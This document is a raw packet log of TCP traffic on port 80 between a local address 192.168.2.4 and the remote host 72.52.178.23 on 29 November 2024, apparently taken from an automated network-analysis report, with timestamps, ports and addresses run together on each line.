                                                                                Nov 29, 2024 01:52:58.668818951 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.668961048 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669329882 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669338942 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669425011 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669434071 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669486046 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669488907 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669517040 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669537067 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669567108 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669569969 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669605970 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669612885 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669651985 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669671059 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669708967 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669723034 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669759989 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.722594976 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.728482962 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789643049 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789691925 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789762020 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.789809942 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789836884 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789979935 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.833667994 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.836750984 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.843061924 CET804981872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.844504118 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.844618082 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.953618050 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.955338001 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.964797974 CET804981872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.001619101 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.004241943 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.117657900 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.213685036 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.214490891 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.461615086 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.462481976 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.503746986 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.503810883 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.582427025 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.623832941 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.623843908 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.623871088 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624003887 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624025106 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624134064 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624142885 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.734289885 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.734405041 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.734445095 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.854408979 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.907155037 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027440071 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.027512074 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027614117 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027654886 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027726889 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027749062 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.074620008 CET804981872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.074697971 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.074731112 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.147530079 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147804976 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147821903 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147831917 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147890091 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.147943974 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147990942 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148052931 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.839066029 CET4984180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.839111090 CET4984180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.883739948 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.928515911 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.941473007 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.959009886 CET804984172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.048475981 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.048609018 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.048749924 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.048820972 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.049031973 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.049060106 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.061384916 CET804984472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.061472893 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.061616898 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.168798923 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.168837070 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169025898 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169034004 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169092894 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169121981 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169147968 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169177055 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169203997 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169240952 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169250011 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169290066 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169339895 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169359922 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169393063 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169435978 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169457912 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169485092 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169508934 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.181701899 CET804984472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290205002 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290215969 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290222883 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290235996 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290280104 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.337598085 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.337850094 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.453591108 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.456574917 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.501694918 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.501904011 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.617639065 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.713668108 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.714117050 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.965730906 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.965790033 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.002756119 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.002942085 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.085764885 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123369932 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123379946 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123392105 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123400927 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123487949 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123497009 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123543024 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.123593092 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.198623896 CET804984472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.198687077 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.198755026 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.232388973 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.232450008 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.232536077 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.319259882 CET804984472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.352494955 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.430565119 CET4984980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.450397015 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.550617933 CET804984972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.551074982 CET4984980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.551235914 CET4984980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.570332050 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.570400953 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.570525885 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.570565939 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.570638895 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.570683956 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.671621084 CET804984972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690401077 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690645933 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690721989 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.690738916 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690747023 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690787077 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690794945 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690905094 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.690920115 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690936089 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.690994024 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.691035032 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.691042900 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.691092968 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.691098928 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.691241980 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.691294909 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.810663939 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.810739040 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.810841084 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.810880899 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.810903072 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.810931921 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.810960054 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.810983896 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.853665113 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.853949070 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.973651886 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.973732948 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.021661043 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.021720886 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.137821913 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.233635902 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.233691931 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.481615067 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.481693029 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.524235010 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.525388002 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.602148056 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.645693064 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.645709991 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.645768881 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.645778894 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.645890951 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.645900011 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.646080017 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.646092892 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.646128893 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.646186113 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.734536886 CET804984972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.734615088 CET4984980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.734648943 CET4984980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.754066944 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.754128933 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.754151106 CET4985080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.847729921 CET4985680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.854572058 CET804984972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.874298096 CET804985072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.954735041 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.967761993 CET804985672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:08.967832088 CET4985680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:08.967962027 CET4985680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.074840069 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.074899912 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.075057030 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.075125933 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.075186968 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.075212002 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.087838888 CET804985672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195019960 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195039034 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195194960 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195214033 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195286036 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195286989 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.195302963 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195355892 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195358038 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.195385933 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195441961 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.195482016 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195492983 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195539951 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.195570946 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195677996 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.195729971 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.315279961 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.315299988 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.315344095 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.315443993 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.315454006 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.315507889 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.357666016 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.357785940 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.477623940 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.478583097 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.521665096 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.522521973 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.641704082 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.729665995 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.730626106 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:09.973778009 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:09.973862886 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:10.064907074 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:10.065077066 CET4985780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:10.093779087 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:10.104758978 CET804985672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:10.104832888 CET4985680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:10.104892969 CET4985680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:10.185343981 CET804985772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.715254068 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.715284109 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.804578066 CET804987372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.816675901 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.833848953 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.833914042 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.833945990 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.936630011 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.940670013 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.945132017 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.955059052 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.065618038 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.198375940 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318397999 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.318470001 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318600893 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318648100 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318728924 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318810940 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.438517094 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438612938 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438637972 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438729048 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.438788891 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438800097 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438857079 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.438894033 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438904047 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438932896 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438942909 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438951969 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.439012051 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.439049959 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.439060926 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.439064980 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.439114094 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.559031963 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559045076 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559098005 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.559111118 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559135914 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559168100 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.559190989 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.601815939 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.601974964 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.721752882 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.721837997 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.765700102 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.765758038 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.885662079 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.885716915 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.045712948 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.045762062 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.102054119 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.102127075 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.102158070 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.206892967 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.222053051 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.249700069 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.249752045 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.309839010 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.309940100 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.326772928 CET804988372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.326834917 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.326968908 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.369647026 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430066109 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430102110 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430149078 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430186033 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430267096 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430275917 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430318117 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.446831942 CET804988372.52.178.23192.168.2.4
